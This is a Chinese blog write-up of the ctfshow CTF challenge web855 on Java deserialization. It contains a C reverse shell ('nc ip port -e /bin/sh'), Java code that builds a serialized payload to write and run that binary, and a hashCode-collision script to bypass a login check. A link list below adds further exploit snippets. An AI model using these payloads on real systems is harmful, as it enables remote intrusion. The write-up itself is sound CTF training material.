CTFSHOW web入门 java反序列化篇 web855

置顶 已于 2022-12-23 17:20:02 修改
阅读量1.9k 收藏
点赞数 3
分类专栏: CTFSHOW web入门系列 文章标签: java 开发语言
于 2022-12-13 15:47:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/128303093
版权

web855

得到源码后看到readObject里面有两条路可以走
1、写文件,文件名固定,文件内容开头固定后面内容可以通过write写入
在这里插入图片描述

2、执行命令,但是shellcodoe是不可控的(static)
在这里插入图片描述
在这里插入图片描述

如果两条路分开来看都没啥可利用的价值,但是放到一起就产生危害了。
可以看到他给的文件固定开头其实是一个elf可执行文件的文件头,也就是说我们可以写一个可执行程序。
接着如果执行shellcode命令则会给该文件一个权限并且执行。
可执行程序可以通过写一个c文件再gcc进行编译。

#include<stdlib.h>
 int main() {
	system("nc ip port -e /bin/sh"); 
	return 0;	
}

我们先来生成该恶意文件gcc a.c -o hack,接着把文件的前四字节删掉(可以用010editor)

接着利用反序列化写入,前面有几个if,我们可以重写writeObject写入

    private void writeObject(ObjectOutputStream out) throws Exception {
        //将名字反转写入二进制流
        out.writeInt(2135247942);
        out.writeByte(1);
        out.writeInt(0x36d);
        File filename = new File("ser/hack"); //gcc生成的文件位置
        BufferedInputStream in = new BufferedInputStream(new FileInputStream(filename));
        ByteArrayOutputStream out2 = new ByteArrayOutputStream(1024);
        byte[] temp = new byte[1024];
        int size = 0;
        while((size = in.read(temp)) != -1){
            out2.write(temp, 0, size);
        }
        in.close();
        byte[] content = out2.toByteArray();
        out.write(content);
        out.defaultWriteObject();
    }

接着创建主类和main函数生成base64序列化串

package com.ctfshow.entity;
import java.io.*;

public class Main {
    public static void main(String[] args)throws Exception {
        User user = new User("123", "123");

        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(user);
        String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
        System.out.println(payload);
    }
}

传入序列化串进行反序列化。

此时已经生成了恶意可执行程序,然后再执行shellcode。
在这里插入图片描述
有个比较关键的点需要绕过。
我们实例化时传入的username和password不能是ctfshow和123456,但是hash比较时又相等。
这个地方需要用到java里面的hash碰撞()
可以用如下代码生成

def hashcode(val):
    h=0
    for i in range(len(val)):
        h=31 * h + ord(val[i])
    return h 
t="ct"
#t="12"
for k in range(1,128):
    for l in range(1,128):
        if t!=(chr(k)+chr(l)):
            if(hashcode(t)==hashcode(chr(k)+chr(l))):
                print(t,chr(k)+chr(l))

得到

ct,dU
12,0Q

可以用dU代替ct,0Q代替12

    private void writeObject(ObjectOutputStream out) throws Exception {
        out.writeInt(2135247942);
        out.writeByte(2);
        out.defaultWriteObject();
    }


package com.ctfshow.entity;
import java.io.*;

public class Main {
    public static void main(String[] args)throws Exception {
        User user = new User("dUfshow", "0Q3456");

        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(user);
        String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
        System.out.println(payload);
    }
}
yu22x
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CTF—Java 反编译&XXE&反序列化
qi_SJQ_的博客
03-02 5960
1.Java 常考点及出题思路: 考点技术:xxe,spel 表达式,反序列化,文件安全,最新框架插件漏洞等。 一般都会设法间接给出源码或相关配置提示文件,间接性源码或直接源码体现等形式,否则单纯黑盒难度比较大。 ctf web信息泄露总结: 参考:https://www.cnblogs.com/xishaonian/p/7628153.html 00x1 .ng 源码泄露 00x2 git 源码泄露 00x3 .DS_Store 文件泄漏 00x4 网站备份压缩文件 00x5 SVN 导致文件泄露 00.
[ctfshow]web入门——反序列化web261+web264-web267)
ShenZ的博客
03-02 6189
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
CtfshowJava反序列化
weixin_56537388的博客
08-15 519
发现进入URLsteamhander,他的hashcode使用了getAddress,我们最终要做的就是调用getaddress,获取DNS解析。调用hashmap最后调用的是url的hashcode方法,在最后调用getaddress。重写是子类对父类可以访问方法的重新编写,返回值和形参都不能改变,可以看到,put的时候调用了hashcode,不是-1了。,子类对象赋值给父类使用,但是不能访问在子类特有的方法。这里的初始值是-1,只有为-1才能传数据。ysoserial工具。这里使用了重写的概念。
ctfshow java (web 279-300)选做
最新发布
ljc13626678577的博客
07-12 1087
ctfshow里面关于java的题目都和struct2专题有关,另外有少量的代码审计的题目。出于效率的考虑,选择选做一些题目。浅浅做几题尝试一下。
CTFSHOW web入门 java反序列化(更新中)
羽的博客
12-07 4664
ctfshow web入门 java反序列化
从CTF学习Java反序列化
why811的博客
08-18 934
我们可以看到cookie里面返回了Java序列化内容,带着cookie访问返回了hello {{username}}的字符,说明我们传入的cookie被反序列化了。其实看到LogHandler不能反序列化的时候,直接一口否定了他的可利用性,并没有去尝试,那么为什么不实际尝试一下呢?其实再仔细一点,可以发现这个类继承了HashSet,HashSet实现了Serializable接口,貌似可以搞事。(但是打final的时候是没有公网的,附件只有源码,需要去靶机上面把本地repo拖下来。
ctfshowJAVA
njh18790816639的博客
04-16 3245
web279~279 这里便是跑脚本的事了! python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action 然后进行利用 python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action -n S2-009 --e
CTFSHOW WEB入门反序列化
Npceer-一位网安初学者的博客
03-01 1169
最近特别懒 等开学在高强度更新其他几 不会写太细 反序列化入门文章找Y4爷爷 反序列化web254web255 web254 直接传 username=xxxxxx&password=xxxxxx web255 首先和254一样 传username和password 然后是需要cookie验证VIP身份 抓包构造 注:需要对分号进行url编码 引号好像不用 我当时瞎搞的 ...
ctfshow-web入门-反序列化(前)
ccfly1012的博客
10-24 6034
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
CTFshow 反序列化 web267
Kradress的博客
02-11 1170
目录思路题解总结 思路 进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变 一个个页面查看源代码,最后再about页面中发现提示 访问?r=site%2Fabout&view-source拿到提示 ///backdoor/shell unserialize(base64_decode($_GET['code'])) 刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信
ctfshow web入门文件包含82-86
xiaolong22333的博客
12-14 2324
知识点: 利用session.upload_progress进行文件包含 条件竞争 思路就是通过上传PHP_SESSION_UPLOAD_PROGRESS来访问/tmp/sess_xxx,从而进行文件包含 原理可以看这文章利用session.upload_progress进行文件包含和反序列化渗透 其中主要的几点 首先上传PHP_SESSION_UPLOAD_PROGRESS,代码如下 <!DOCTYPE html> <html> <body> <f
java反序列化利用工具
07-06
java反序列化 weblogic反序列化
ctfshow- java
qq_45951598的博客
08-25 561
web279-294 296-297 yu师傅脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47
ctfshow java
SopRomeo的博客
01-27 1076
web279 这个编号有点奇怪,搜搜 漏洞讲解 里面有payload直接用,我不知道啥原因echo FLAG flag不出来 因为这是动态靶机,直接看/proc/self/environ %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.
ctfshow刷题(Java反序列化)
网安菜鸡学习笔记
07-06 309
CTFshowJava反序列化 web846 urldns链 import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.ObjectOutput; import java.io.ObjectOutputStream; import java.lang.reflect.Field...
ctfshow web入门(java)
qq_53263789的博客
07-19 836
ctfshow
CTFSHOW JAVA
羽的博客
12-17 3765
WEB279-294 296-297 脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47e-4f
【CTF】java反序列-2020-网鼎杯-朱雀组-Web-think_java
(∪.∪ )...zzz的博客
06-13 3604
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
java反序列化漏洞在CTF中的利用
m0_64893612的博客
03-01 1082
序列化指的是将对象或数据结构转换为可存储或传输的格式的过程,实现的方法是;反序列化则反之,实现的方法是,可以简单地理解为将文件压缩和解压缩的过程。与PHP中反序列互相触发魔法函数导致的漏洞成因不同,java反序列化漏洞的成因主要是由于java序列化和反序列化机制的设计特点所致,简单地讲,只要反序列化代码中含有危险的命令代码,且该代码的参数是可控的,那它就存在该漏洞。漏洞原理在我今天这里不是重要的,我主要想记录的是该漏洞的利用方式。通常在解题中如果你看到一段字符串以rO0AB。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值